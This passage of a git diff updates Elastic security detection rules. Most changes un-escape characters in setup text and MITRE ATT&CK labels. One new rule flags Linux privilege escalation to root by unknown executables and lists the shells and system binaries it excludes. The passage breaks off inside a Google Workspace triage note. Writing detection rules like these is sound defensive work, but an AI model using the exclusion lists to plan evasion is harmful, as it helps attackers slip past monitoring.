a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json index aa8c28dca19..10377be65d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json index e916b2d5acc..11fdc51ad14 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json index 50a083f0341..a2750385aea 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json index 0bfca08c47b..4f89293beb4 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json index c6269be7209..6275380904c 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json index 911c4927951..ff5722583a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json index 7f70429157c..6dc95cbc393 100644 --- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json index 82cab8caab7..3215e0bf9ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json index f751fd2dd34..dda87e75984 100644 --- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json index 17971da1b9c..b475539cf73 100644 --- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json index db6eeec7c4e..e175642670e 100644 --- a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json +++ b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json index 369a360d17a..d4a15e4900e 100644 --- a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json +++ b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_1.json b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_1.json new file mode 100644 index 00000000000..59b3cf55f08 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_1.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the elevation of regular user permissions to root permissions through a previously unknown executable. Attackers may attempt to evade detection by hijacking the execution flow and hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "UID Elevation from Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "process.executable", + "process.command_line" + ], + "query": "host.os.type:\"linux\" and event.category:\"process\" and event.action:\"uid_change\" and event.type:\"change\" and user.id:\"0\"\nand process.parent.name:(\"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\") and not (\n process.executable:(\n /bin/* or /usr/bin/* or /sbin/* or /usr/sbin/* or /snap/* or /tmp/newroot/* or /var/lib/docker/* or /usr/local/*\n ) or\n process.name:(\n \"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\" or \"sudo\" or \"su\" or \"apt\" or \"apt-get\" or\n \"aptitude\" or \"squid\" or \"snap\" or \"fusermount\" or \"pkexec\" or \"umount\"\n ) or\n process.args:/usr/bin/python*\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7787362c-90ff-4b1a-b313-8808b1020e64", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.013", + "name": "KernelCallbackTable", + "reference": "https://attack.mitre.org/techniques/T1574/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "7787362c-90ff-4b1a-b313-8808b1020e64_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json index c689e96b1e5..e95653ac7f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -57,7 +57,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json index 1607a40ae2a..da4b147802b 100644 --- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -62,7 +62,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json index 1f3c659534f..e585bc09402 100644 --- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json +++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -64,7 +64,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json index f7e64608e82..a74d04bca6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json +++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json index d744cf1ff80..cc25a48826c 100644 --- a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json +++ b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json index 55a8b667854..02ed3d52218 100644 --- a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json +++ b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Added to Google Workspace Domain", - "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud 